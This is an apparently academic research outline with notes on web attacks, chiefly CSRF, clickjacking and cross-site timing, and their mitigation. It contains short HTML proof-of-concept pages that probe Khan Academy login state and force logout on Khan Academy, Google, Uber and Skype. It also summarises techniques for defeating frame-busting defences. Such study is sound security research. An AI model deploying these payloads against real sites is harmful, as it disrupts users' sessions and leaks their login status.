* Paper Outline
** Title
- Summary of Abstract
** Abstract
1/2 page
- Summary of Intro
** Introduction
2-3 pages
- Summary of paper
- Motivation
- Related Work
- 
** Motivation(Pitch)
- Why is it important
** Related Work
** Method and Technique
- What is FIM
- How we modeled it alloy
- Implementation of experiment
- Conclusion
- Future Outlook
* Experiment
** Generic
*** Vulnerabilities Check
**** CSRF
**** Click jacking
**** cross site timing attack
- Mitigate atacks using corp extension. 
how: 
- fix one website, then based on e
*** Mitigation tests
- using corp extension 

* Mitigation

* TODO 
- Login with google websites
- find a vulnerable endpoint
- vlabs end points

* Robin Linus
- all the websits which use FIM, are vulnerable to click jacking which they are
  on the robin linus site.



* Attack 1 : Cross-Site Timing Attack
- Use with Khanacademy: if logged in logo will show up else not;.
#+BEGIN_SRC html :tangle khanacademychecklogin.html
<html>
  <head><title>Khanacademy Check Login Attack</title></head>
  <body>
    <img src="https://www.khanacademy.org/login?continue=%2Ffavicon.ico"/>
  </body>
  
</html>
#+END_SRC
* Attack Khanacademy Logout:
#+BEGIN_SRC html :tangle khanacademylogout.html
<html>
<head><title>Khanacademy Logout Attack</title></head>
<body>
<img src="https://khanacademy.org/logout?contine=/"/>
</body>
</html>
#+END_SRC
* Attack Google Logout
#+BEGIN_SRC html :tangle googlelogout.html
<html>
<head><title>Google Logout Attack</title></head>
<body>
<img src="https://accounts.google.com/logout"/>
</body>
</html>
#+END_SRC
* Uber logout
#+BEGIN_SRC html :tangle  uberlogout.html
<html>
<head><title>Attacker</title></head>
<body>
<img src="https://riders.uber.com/logout"/>
</body>
</html>
#+END_SRC
* Skype logout
#+BEGIN_SRC html :tangle skypelogout.html
<html>
<head><title>Attacker</title></head>
<body>
<img src="https://secure.skype.com/portal/logout"/>
</body>
</html>
#+END_SRC

* Read on clickjacking
** Busting Frame Busting:a Study of Clickjacking Vulnerabilities on Popular Sites
This paper was published in 2010 . It shows many vulnerability in sites at those times 
and how clickjacking cannot be stopped just by frame busting and new policies must be 
added into our web.

*** Frame bursting example
 i f ( top . location   !=   self.location ){
top .location = self.location ;
}


*** Methods against frame bursting
  1.Use the window.onbeforeunload function to not unload a frame
    1.1 this can be done by asking the user "to not leave page"(alert box) 
    1.2 Flushing the request to unload by stopping the unload request by continuously calling this window.onbeforeunload\
  2.Disable js (both inline and external )
    2.1 inline by by using XSS filters to not allow these scripts
    2.2 External by simplying disable js

  
  3.By passing the Regular expressions in frame busting js 
    By just placing the domian of the victim in the url

  4.Changing the value of location as  it can be redefined

  5.Security="restricted"

** Faults in XFO
   1.Per page specification
   2.One-type domain allowed per page 
   3. *Proxies can remove headers*


** XFO Headers 
   meta tags to make website more secrue by only allowing only some iframes(Cross origin request) 
   using the value specified in the header
*** Value of the header
    1.DENY
    2.SAMEORIGIN
    3.ALLOWED-FROM

 

** X-Content-type
   headers which specify what kind of file is being loaded by a particular request
   eg. text/plain,text/html,images/jpeg
